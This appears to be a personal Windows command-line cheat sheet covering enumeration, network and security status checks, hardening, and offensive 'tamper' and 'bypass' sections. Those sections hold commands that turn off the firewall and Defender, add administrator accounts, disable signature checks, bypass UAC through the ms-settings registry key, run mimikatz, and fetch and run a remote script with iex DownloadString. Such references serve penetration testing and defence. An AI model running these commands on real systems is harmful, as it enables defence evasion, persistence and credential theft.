sys / win

MENU

• copy
  • copy-dir
  • copy-file
• enum
  • get-kb
  • get-logs
  • get-gpo
  • get-os
  • get-products
  • get-processes
  • get-scheduled-tasks
  • get-services
  • get-sessions
  • get-path
  • get-pipes
  • get-usb-devices
  • get-users
  • get-vss
• enum-net
  • get-ca
  • get-dc
  • get-neighbors
  • get-net-settings
  • get-routes
  • get-shares
• enum-sec
  • get-acls
  • get-certificate-info
  • get-file-hash
  • get-fw-status
  • get-fw-rules
  • get-status-proxy
  • get-status-defender
  • get-status-cred-guard
  • get-status-ppl
• exec
  • decode-base64
• install
  • gpedit-win-10-home
• run
  • network-capture
• tamper
  • add-account
  • add-regkey
  • del-regkey
  • set-fs-perms
  • set-kb
  • set-network
  • set-proxy
  • set-rdp
  • set-winrm
  • set-smbv1
  • unset-fw
  • unset-defender
  • unset-cred-guard
  • unset-ppl
  • unset-sigcheck
  • unset-restricted-admin-mode
  • dl-ps-ad-module
• harden
  • set-msdefender
  • disable-llmnr
  • disable-ms-msdt
  • schtasks-secure-pwd
• bypass
  • bypass-uac
  • bypass-lsaprotection
  • bypass-sources
• misc
  • run
  • dism
  • wsl

ALSO

• windows logs

copy

copy-dir

robocopy.exe "C:\windows\system32\winevt\logs\" "C:\windows\temp\logs"

copy-file

# copy a single
robocopy.exe /MIR "C:\windows\system32\winevt\logs\" "C:\windows\temp" Security.evtx

enum

get-kb

# listing KB wmi
wmic qfe list full /format:table

# listing KB ps
powershell -Command "systeminfo /FO CSV" | out-file C:\Windows\Temp\systeminfo.csv
import-csv C:\Windows\Temp\systeminfo.csv | ForEach-Object{$_."Correctif(s)"}

get-logs

Get-WmiObject win32_nteventlogfile

get-gpo

rsop
gpresult /Z /scope:computer 

get-os

# listing OS version
wmic os list brief
wmic os get MUILanguages

get-products

# listing windows product
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:csv

get-processes

# listing windows services 
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:csv
# winrm service
Get-WmiObject -Class win32_service | Where-Object {$_.name -like "WinRM"}

get-scheduled-tasks

# list a specific tasks
schtasks /query /TN "Bitlocker" /fo LIST

# list all tasks
schtasks /query /fo LIST /v

get-services

# listing windows processes
wmic process get CSName,Description,ExecutablePath,ProcessId /format:csv

# services by status
Get-Service | Where-Object {$_.Status -eq "Running"}
Get-Service | Where-Object {$_.Status -eq "Stopped"}

#service specific
Get-Service | Where-Object {$_.Name -like "**"}

#service full details
gwmi win32_service|?{$_.name -eq "CSFalconService"}|select *

#service executable path
gwmi win32_service|?{$_.name -eq "CSFalconService"}|select pathname

#services launched via svchost (for service group LocalServiceNoNetwork) 
#https://x.com/nas_bench/status/1432459464146309136/photo/1
for /F %i in ('powershell.exe -Command "(Get-ItemProperty 'hklm:\software\Microsoft\Windows NT\CurrentVersion\SVCHOST') | select -expandProperty LocalServiceNoNetwork"') do powershell.exe -Command "(Get-ItemProperty 'hklm:\system\CurrentControlSet\Services\%i')" 

get-sessions

# listing the active sessions
quser
qwinsta

# display the list of the running processes in the specific RDP session (the session ID is specified):
qprocess /id:5

# killing a session / below '2' is the session ID
logoff 2

# last-sessions
# global view
wmic netlogin get Name,LastLogon,LastLogoff,NumberOfLogons,BadPasswordCount

# backlog of the security eventlogs
Get-WinEvent -FilterHashtable @{ProviderName="Microsoft-Windows-Security-Auditing"; id=4624} -Oldest -Max 1 | Select TimeCreated

# user timeline based on the security eventlogs
$ztarg_usersid=''
$ztarg_username='' #username only, no '$zdom\' prefix
Get-WinEvent -FilterHashtable @{'Logname'='Security';'id'=4624,4634} -Max 80 | Where-Object -Property Message -Match $ztarg_username|  select ID,TaskDisplayName,TimeCreated
Get-WinEvent -FilterHashtable @{Logname='Security';ID=4624,4634;Data=$ztarg_usersid} -Max 80 |  select ID,TaskDisplayName,TimeCreated

get-path

gci env:path | fl *

get-pipes

# printnightmare / CVE-2021-1675/CVE-2021-34527 / 
ls \\localhost\pipe\spoolss

get-usb-devices

# https://www.shellhacks.com/windows-lsusb-equivalent-powershell/
Get-PnpDevice -PresentOnly | Where-Object { $_.InstanceId -match '^USB' } | FT -autosize 
Get-PnpDevice -PresentOnly | Where-Object { $_.InstanceId -match '^USB' } | Format-List

get-users

# get local users
wmic netlogin list brief
net user

# get local users, SID
Get-WmiObject win32_useraccount | Select name,sid
wmic useraccount get name,sid
wmic useraccount where name=john.doe get sid 

# get acconut creation date
dir /tc C:\Users

# get local groups and members 
net localgroup
net localgroup Administrators

get-vss

# listing
vssadmin list shadows
vssadmin list shadowstorage
vssadmin list volumes

# create a shadow copy for C:
vssadmin create shadow /for=c:

enum-net

get-ca

# run it on CA servers
certutil -scroot update

get-dc

echo %LOGONSERVER%

get-neighbors

# show the mac address table
arp -a

# show a neighbor
netstat -A 192.168.1.254

# show ipv6 neighbors
netsh interface ipv6 show neighbors

get-net-settings

# listing network hardware
wmic nic list brief
ipconfig /all

# listing network software 
wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress
ipconfig /all
route -n
netstat -ano

get-routes

# Display all routing tables
route print

# Print IPv4 routing table
route print -4

# Print IPv6 routing table
route print -6

get-shares

# listing network shares
wmic netuse list brief
net use

wmic share
net share

# listing the domain controllers
nltest /dclist:dom.corp

enum-sec

get-acls

get-certificate-info

# certificates local stores: https://adamtheautomator.com/windows-certificate-manager/
certutil dump toto.pem
certutil dump toto.crt

get-file-hash

certutil -hashfile X SHA256
get-filehash X

get-fw-status

# logfile: %systemroot%\system32\LogFiles\Firewall\pfirewall.log
netsh advfirewall show allprofiles
netsh firewall show portopening

get-fw-rules

# IN
Get-NetFirewallRule -Action Allow -Enabled True -Direction Inbound |
Format-Table -Property Name,
@{Name='Protocol';Expression={($PSItem | Get-NetFirewallPortFilter).Protocol}},
@{Name='LocalPort';Expression={($PSItem | Get-NetFirewallPortFilter).LocalPort}},
@{Name='RemotePort';Expression={($PSItem | Get-NetFirewallPortFilter).RemotePort}},
@{Name='RemoteAddress';Expression={($PSItem | Get-NetFirewallAddressFilter).RemoteAddress}},
Enabled,Profile,Direction,Action

# OUT
Get-NetFirewallRule -Action Allow -Enabled True -Direction Outbound |
Format-Table -Property Name,
@{Name='Protocol';Expression={($PSItem | Get-NetFirewallPortFilter).Protocol}},
@{Name='LocalPort';Expression={($PSItem | Get-NetFirewallPortFilter).LocalPort}},
@{Name='RemotePort';Expression={($PSItem | Get-NetFirewallPortFilter).RemotePort}},
@{Name='RemoteAddress';Expression={($PSItem | Get-NetFirewallAddressFilter).RemoteAddress}},
Enabled,Profile,Direction,Action

get-status-proxy

##############################
#
#          Windows
#
netsh winhttp show proxy
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
(Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings').ProxyEnable

##############################
#
#      ForcePoint WebSense
#
#
# 01 # config local and saas
dir HKLM:\SOFTWARE\Websense
Invoke-WebRequest -URI http://query.webdefence.global.blackspider.com/?with=all
#
# 02 # service names and status
Get-Service | Where-Object{$_.DisplayName -like "*websense*"}

Status   Name               DisplayName
------   ----               -----------
Stopped  WSDLP              Websense Client Agent
Running  WSPXY              Websense SaaS Service
Stopped  WSRF               Websense Desktop Client
Stopped  WSTS               Websense DCEP Service

Get-Service | Where-Object{$_.DisplayName -like "*Forcepoint*"}

Status   Name               DisplayName
------   ----               -----------
Running  FPDIAG             Forcepoint Endpoint Diagnostics
Stopped  fpeca              Forcepoint Endpoint Context Agent
Stopped  fpneonetworksvc    Forcepoint Network Proxy

# 03 # service status detailed
sc query WSPXY
sc query FPDIAG

get-status-defender

Get-MpComputerStatus
powershell -inputformat none -outputformat text -NonInteractive -Command 'Get-MpPreference | select -ExpandProperty "DisableRealtimeMonitoring"'

get-status-cred-guard

Run the following powershell commands as local administrator:

powershell -ep bypass
# if DWORD value named LsaCfgFlags is set to :
#  - 0 is disabled
#  - 1 then Windows Defender Credential Guard is enabled with UEFI lock
#  - 2 then Windows Defender Credential Guard enabled without lock
dir HKLM:\SYSTEM\CurrentControlSet\Control\Lsa*
# if DWORD value named EnableVirtualizationBasedSecurity is set to : 
#  - 0 then virtualization-based security is disabled
#  - 1 then virtualization-based security is enabled
# if DWORD value named RequirePlatformSecurityFeatures is set to :
#  - 1 then Secure Boot only 
#  - 3 then Secure Boot and DMA protection
dir HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard*

Reference :

• MSDN - Credential Guard Management

get-status-ppl

exec

decode-base64

echo "" | base64 -d | iconv -f UTF-16LE -t UTF-8 

install

gpedit-win-10-home

# useful for commando VM
FOR %F IN ("%SystemRoot%\servicing\Packages\Microsoft-Windows-GroupPolicy-ClientTools-Package~*.mum") DO (DISM /Online /NoRestart /Add-Package:"%F")
FOR %F IN ("%SystemRoot%\servicing\Packages\Microsoft-Windows-GroupPolicy-ClientExtensions-Package~*.mum") DO (DISM /Online /NoRestart /Add-Package:"%F")

run

network-capture

netsh trace start tracefile=C:\temp\trace.etl
netsh trace stop

##################################################################### ##################################################################### # #####################################################################

tamper

add-account

# create a local user account
net user /ADD test test

# create a local user account and prompt for the pwd
net user /ADD test *

# create a domain user account prompt for the pwd
net user /ADD test * /DOMAIN

# add the new user to administrators
net localgroup Administrators test /ADD
net localgroup Administrators corp\test /ADD

add-regkey

del-regkey

set "SID=1-5-21-XXX-500"
reg delete HKEY_USERS\%SID%\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v abcdef123456 /f

set-fs-perms

# https://superuser.com/questions/1002883/how-do-i-specify-chmod-744-in-powershell
# Set Owner of a specific file
icacls "test.txt" /setowner "administrator"

# Grant Full Control
icacls "test.txt" /grant:r "administrator:(F)" /C

# Grant Read and Execute Access of a specific file
icacls "test.txt" /grant:r "users:(RX)" /C
icacls "test.txt" /grant:r "utilisateurs:(RX)" /C

# Grant Read-only Access of a specific file
icacls "test.txt" /grant:r "users:(R)" /C
icacls "test.txt" /grant:r "utilisateurs:(RX)" /C

set-kb

Set-WinUserLanguageList -Force "fr-FR"
Set-WinUserLanguageList -Force "en-US"

set-network

netsh interface ip set address "connection name" static 192.168.1.1 255.255.255.0 192.168.1.254
netsh interface ip add dns "connection name" 8.8.8.8

set-proxy

set HTTP_PROXY=http://proxy_userid:proxy_password@proxy_ip:proxy_port
set FTP_PROXY=%HTTP_PROXY%
set HTTPS_PROXY=%HTTP_PROXY%

set-rdp

net localgroup "Remote Desktop Users" $zlat_user /add

Learn about session stealing at hacktricks.xyz

set-winrm

# client: check winrm service status
Get-WmiObject -Class win32_service | Where-Object {$_.name -like "WinRM"}
Get-Item wsman:\localhost\Client\TrustedHosts

# client: activate winrm and trustedhosts
Start-Service WinRM
Set-Service WinRM -StartMode Automatic
Set-Item wsman:\localhost\client\trustedhosts -Value *

# server
Enable-PSRemoting

set-shares

# win10 tampering: PS allow administrative shares
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Value 1 

set-smbv1

# DISM 
DISM /online /enable-feature /featurename:SMB1Protocol
DISM /online /enable-feature /featurename:SMB1Protocol-Client
DISM /online /enable-feature /featurename:SMB1Protocol-Server
DISM /online /enable-feature /featurename:SMB1Protocol-Deprecation

# win10 tampering: PS activate SMBv1 OptionalFeatures
Enable-WindowsOptionalFeature -Online -FeatureName smb1protocol

# win10 tampering: PS enable SMB v1
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 1 –Force

unset-fw

netsh advfirewall set publicprofile state off
netsh advfirewall set privateprofile state off
netsh advfirewall set domainprofile state off
netsh advfirewall set allprofiles state off

unset-defender

# requires local admin privilege
powershell.exe -Command Set-MpPreference -DisableRealtimeMonitoring $true

# local privilege escalation
https://github.com/anonymous300502/Nuke-AMSI
https://github.com/OmerYa/Invisi-Shell
https://amsi.fail/

unset-cred-guard

unset-ppl

Tools that disable PPL flags on the LSASS process by patching the EPROCESS kernel

• PPLFault
• EDRSandBlast
• PPLdump
• PPLKiller

unset-sigcheck

Windows driver signature: disable:

bcdedit.exe /set nointegritychecks on
bcdedit.exe /set testsigning on

unset-restricted-admin-mode

# no need to reboot
reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v 1

dl-ps-ad-module

#version 1
iex (new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1');Import-ActiveDirectory

harden

set-msdefender

# disable monitoring
Set-MpPreference -DisableRealtimeMonitoring 0
# enable monitoring
Set-MpPreference -DisableRealtimeMonitoring 1

disable-llmnr

REG ADD  “HKLM\Software\policies\Microsoft\Windows NT\DNSClient”
REG ADD  “HKLM\Software\policies\Microsoft\Windows NT\DNSClient” /v ”EnableMulticast” /t REG_DWORD /d “0” /f

disable-ms-msdt

# MS-MSDT protocol used by follina exploit, CVE-2022-30190
RED DEL "HKEY_CLASSES_ROOT\ms-msdt" /f

schtasks-secure-pwd

• duffney.io

bypass

bypass-uac

powershell New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value cmd.exe -Force

bypass-lsaprotection

powershell .\ConsoleApplication1.exe/InstallDriver
powershell .\ConsoleApplication1.exe/makeSYSTEMcmd
powershell .\mimikatz.exe

bypass-sources

• Windows command-line obfuscation
• powershell obfuscation using securestring

misc

run

Name	Function
Add/Remove Programs	appwiz.cpl
Administrative Tools	control admintools
Automatic Updates	wuaucpl.cpl
Bluetooth Transfer wizard	fsquirt
Certificate Manager	certmgr.msc
Character Map	charmap
Control Panel	control
Computer Management	compmgmt.msc
Date and Time Properties	timedate.cpl
Driver Verifier Utility	verifier
Event Viewer	eventvwr.msc
File Signature Verification Tool	sigverif
Group Policy Editor	gpedit.msc
Logs out of windows	logoff
Malicious Software Removal Tool	mrt
Monitors Display	desk.cpl
Network Connections	ncpa.cpl
Password Properties	password.cpl
Performance Monitor	perfmon.msc
Registry Editor	regedit
Remote Desktop	mstsc
Security Center wscui.cpl
Sounds and Audio	mmsys.cpl
Shuts Down Windows	shutdown
SQL Client Configuration	cliconfg
System Configuration Utility	msconfig
Task Manager	taskmgr
Task Scheduler	taskschd.msc
User Account Management	nusrmgr.cpl
Windows Firewall	firewall.cpl
Windows Version	winver
Wordpad	Write

dism

# Pre requisites: Admin rights
# get all windows feature and save to a txt file
DISM /online /get-features /format:table > C:\Temp\dism_listing.txt
get-windowsoptionalfeature -online | ft | more

# get windows feature that are enable/disable
DISM /online /get-features /format:table | find “Enabled” | more
DISM /online /get-features /format:table | find “Disabled” | more

# get windows feature by its name
DISM /online /get-featureinfo /featurename:Microsoft-Windows-Subsystem-Linux
DISM /online /get-featureinfo /featurename:TelnetClient
get-windowsoptionalfeature -online -featurename SMB1Protocol*
get-windowsoptionalfeature -online -featurename SMB1Protocol* |ft

wsl

Windows WSL manual distro install

# Note: By pass the GPO blocking the exec of the App Store app

Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux
New-Item C:\Ubuntu -ItemType Directory
Set-Location C:\Ubuntu
Invoke-WebRequest -Uri https://aka.ms/wsl-ubuntu-1604 -OutFile Ubuntu.appx -UseBasicParsing
Invoke-WebRequest -Uri https://aka.ms/wslubuntu2004 -OutFile Ubuntu.appx -UseBasicParsing
Invoke-WebRequest -Uri https://aka.ms/wsl-kali-linux-new -OutFile Kali.appx -UseBasicParsing
 
# Extract and execute the EXE in the archive to install the distro
Rename-Item .\Ubuntu.appx Ubuntu.zip
Expand-Archive .\Ubuntu.zip -Verbose
Ubuntu.exe

# List the distributions installed
wslconfig /list /all
wsl -l